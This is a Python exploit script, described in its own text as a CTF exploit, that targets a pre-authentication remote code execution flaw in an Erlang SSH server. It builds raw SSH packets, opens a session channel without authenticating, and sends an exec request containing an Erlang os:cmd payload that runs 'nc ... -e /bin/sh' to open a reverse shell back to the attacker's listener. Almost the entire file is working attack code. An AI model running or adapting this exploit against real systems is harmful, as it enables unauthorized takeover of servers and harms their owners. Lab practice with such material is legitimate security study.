#!/usr/bin/env python3
import argparse
import socket
import struct
import time
import sys

def parse_args():
    parser = argparse.ArgumentParser(
        description="CTF exploit: send a pre-auth SSH channel request "
                    "with an Erlang RCE payload to get a reverse shell"
    )
    parser.add_argument(
        "-lh", "--lhost",
        required=True,
        help="Local host/IP to receive the reverse shell"
    )
    parser.add_argument(
        "-lp", "--lport",
        type=int,
        required=True,
        help="Local port to receive the reverse shell"
    )
    parser.add_argument(
        "-rh", "--rhost",
        default="10.10.248.101",
        help="Target SSH server IP (default: 10.10.248.101)"
    )
    parser.add_argument(
        "-rp", "--rport",
        type=int,
        default=22,
        help="Target SSH server port (default: 22)"
    )
    return parser.parse_args()

def string_payload(s: str) -> bytes:
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b

def build_channel_open(channel_id: int = 0) -> bytes:
    return (
        b"\x5a"                       # SSH_MSG_CHANNEL_OPEN
        + string_payload("session")
        + struct.pack(">I", channel_id)
        + struct.pack(">I", 0x68000)  # initial window size
        + struct.pack(">I", 0x10000)  # max packet size
    )

def build_channel_request(channel_id: int, lhost: str, lport: int) -> bytes:
    # Erlang RCE payload using netcat; trailing period is required
    payload = f'os:cmd("nc {lhost} {lport} -e /bin/sh").'
    return (
        b"\x62"                      # SSH_MSG_CHANNEL_REQUEST
        + struct.pack(">I", channel_id)
        + string_payload("exec")
        + b"\x01"                    # want_reply = True
        + string_payload(payload)
    )

def build_kexinit() -> bytes:
    cookie = b"\x00" * 16
    def nl(lst): return string_payload(",".join(lst))
    return (
        b"\x14"  # SSH_MSG_KEXINIT
        + cookie
        + nl([
            "curve25519-sha256", "ecdh-sha2-nistp256",
            "diffie-hellman-group-exchange-sha256",
            "diffie-hellman-group14-sha256",
        ])
        + nl(["rsa-sha2-256", "rsa-sha2-512"])
        + nl(["aes128-ctr"]) * 2
        + nl(["hmac-sha1"]) * 2
        + nl(["none"]) * 2
        + nl([]) * 2
        + b"\x00"                    # first_kex_packet_follows
        + struct.pack(">I", 0)       # reserved
    )

def pad_packet(pkt: bytes, block_size: int = 8) -> bytes:
    min_pad = 4
    pad_len = block_size - ((len(pkt) + 5) % block_size)
    if pad_len < min_pad:
        pad_len += block_size
    total_len = len(pkt) + 1 + pad_len
    return struct.pack(">I", total_len) + bytes([pad_len]) + pkt + b"\x00" * pad_len

def main():
    args = parse_args()
    print(f"[*] Target: {args.rhost}:{args.rport}")
    print(f"[*] Listener: {args.lhost}:{args.lport}")

    try:
        with socket.create_connection((args.rhost, args.rport), timeout=5) as s:
            print("[*] Connected. Exchanging banner...")
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            banner = s.recv(1024)
            print(f"[+] Banner: {banner.strip().decode(errors='ignore')}")

            time.sleep(0.3)
            print("[*] Sending fake KEXINIT...")
            s.sendall(pad_packet(build_kexinit()))

            time.sleep(0.3)
            print("[*] Opening channel...")
            s.sendall(pad_packet(build_channel_open()))

            time.sleep(0.3)
            print("[*] Sending exec request with Erlang reverse-shell payload...")
            req = build_channel_request(0, args.lhost, args.lport)
            s.sendall(pad_packet(req))

            print("[✓] Payload sent. If the server is vulnerable, check your listener now.")
            # Optionally read any immediate response
            try:
                resp = s.recv(1024, socket.MSG_DONTWAIT)
                if resp:
                    print(f"[+] Response: {resp.hex()}")
            except (BlockingIOError, AttributeError):
                pass

    except Exception as e:
        print(f"[!] Exploit failed: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()